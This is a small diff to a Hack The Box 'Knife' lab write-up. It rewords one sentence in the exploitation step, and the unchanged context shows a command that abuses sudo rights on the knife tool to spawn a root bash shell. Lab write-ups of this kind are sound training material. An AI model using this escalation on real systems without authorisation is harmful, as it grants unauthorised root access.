mmezirard/mmezirard.github.io/content/htb-write-ups/boxes/knife/index.md

 ### Exploitation

-I'll just copy and paste the given command to abuse our `sudo` permissions, but I'll change the shell to `/bin/bash`:
+I'll use the given command to abuse our `sudo` permissions, but I'll change the shell to `/bin/bash`:

 ```sh
 james@knife:~$ sudo knife exec -E 'exec "/bin/bash"'